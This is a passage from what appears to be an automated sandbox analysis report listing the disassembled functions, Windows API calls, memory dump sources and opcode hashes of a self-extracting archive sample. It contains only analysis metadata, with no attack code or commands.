                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 46ec6e24fe145085017fa479697ca07427334201afc6053eeaea5d43913d0bad
                                                                                              • Instruction ID: a7c36eec2fcb0cf396808d91f825bf3a3d05fdee9212f8bb55911e6f7209ed3d
                                                                                              • Opcode Fuzzy Hash: 46ec6e24fe145085017fa479697ca07427334201afc6053eeaea5d43913d0bad
                                                                                              • Instruction Fuzzy Hash: D7C01234400319868E248A34A8480997322AA537B6BBC8694C228890E1C32ACC87EB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9556336af04ebf5926a85dd8c9c4e282a72391715b553f8036bfd1fb3043bac0
                                                                                              • Instruction ID: 0dd1916c392dde8c20eef9610e2328474ee46102469ef93c56c6005069f980e2
                                                                                              • Opcode Fuzzy Hash: 9556336af04ebf5926a85dd8c9c4e282a72391715b553f8036bfd1fb3043bac0
                                                                                              • Instruction Fuzzy Hash: 93B012E129D100FC3104A1081C06D77024DC0C0F11730D03FFC04E10C2D88C4D090533
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 447f96af7f49a2c7bf6232f64da9545bb88eed88187e3c6011962fcc82f46fd4
                                                                                              • Instruction ID: 8c0149d7093b269c874a0468c17bdec41ede440116b6249c838c1869864627b2
                                                                                              • Opcode Fuzzy Hash: 447f96af7f49a2c7bf6232f64da9545bb88eed88187e3c6011962fcc82f46fd4
                                                                                              • Instruction Fuzzy Hash: CFB012F129D100FC3104A1081C06D77024DC0C0F15730903EFC04D10C2D88C4F050533
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                              • Instruction ID: d676017cb514d46781c14cceb52345243d8f9aea8618019e8bf7f8fc1272e336
                                                                                              • Opcode Fuzzy Hash: 2c9b7c4daedf7c3ce857f0a872ffe9a1189b3316f4c7875894da4be305f4885b
                                                                                              • Instruction Fuzzy Hash: E8B012E129D100FC310461081D06DB7024DC0C0F11730D03FF904E50C2D88C0D0E0533
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                              • Instruction ID: a26f6f8f0c7f9fc05cd758a056cf613eea9718dca0be05c69ebac4090bb49eb3
                                                                                              • Opcode Fuzzy Hash: 59470f4a5b12aca5291889b6e8b0b133c8a3dc948fd62a782ba71cc2703834a3
                                                                                              • Instruction Fuzzy Hash: 19A001E66AA252BD350962516D1ADBB025DC4C1B2AB30A52EF825A54C2AC88194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                              • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                              • Opcode Fuzzy Hash: 5e58842bd30a254c357fa976c0af53eebd4ce185181d9d39634e4aa156ecacf7
                                                                                              • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                              • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                              • Opcode Fuzzy Hash: 6f65ae3a57c5c9e4a6c05c73d7865f7fb5711b6c6f2a7e30f3e33934150ea7af
                                                                                              • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                              • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                              • Opcode Fuzzy Hash: e7035b0119bc030508e03973b0d1c78cbc63c66913dc5ef214bbe68c489101d2
                                                                                              • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                              • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                              • Opcode Fuzzy Hash: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                              • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                              • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                              • Opcode Fuzzy Hash: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                              • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX1,00000000,0076946A,00000006), ref: 0073AC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                              • Instruction ID: c89f6f938b2502366a7f1a09014f124e335746d3a76d5f912cf93ee1f6f16f43
                                                                                              • Opcode Fuzzy Hash: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                              • Instruction Fuzzy Hash: ABA012301006048782000B318F0554E76556F51741F00C024600080030C738C820A504
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0073C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                                • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0073C2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 0073C2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 0073C2E0
                                                                                              • SetFocus.USER32(00000000), ref: 0073C2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0073C321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0073C358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0073C36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0073C38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C3D4
                                                                                              • _swprintf.LIBCMT ref: 0073C404
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0073C417
                                                                                              • FindClose.KERNEL32(00000000), ref: 0073C41E
                                                                                              • _swprintf.LIBCMT ref: 0073C477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0073C48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0073C4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0073C4C7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C509
                                                                                              • _swprintf.LIBCMT ref: 0073C535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0073C548
                                                                                              • _swprintf.LIBCMT ref: 0073C59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0073C5AF
                                                                                                • Part of subcall function 0073AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0073AF35
                                                                                                • Part of subcall function 0073AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0075E72C,?,?), ref: 0073AF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$Ps$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-3735763087
                                                                                              • Opcode ID: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
                                                                                              • Instruction ID: 41af8123e138c39991a9e39684acf271988da33a1a71e735d3e27b5ac938812c
                                                                                              • Opcode Fuzzy Hash: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
                                                                                              • Instruction Fuzzy Hash: 3891C672548348BBE221DBB4DC4DFFB77ACEB49B01F048819F649D6081E779AA048762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0073F844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0073F910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0073F930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0073F93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
                                                                                              • Instruction ID: 8b4d795f7de893f82f85794bf1835eb9a3f6497b868faec1255c92c1421c02c2
                                                                                              • Opcode Fuzzy Hash: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
                                                                                              • Instruction Fuzzy Hash: 3B312B75D0531DDBEB11DFA4D9897CCBBB8AF04344F1040AAE40CA7261EB759B848F44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00721100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
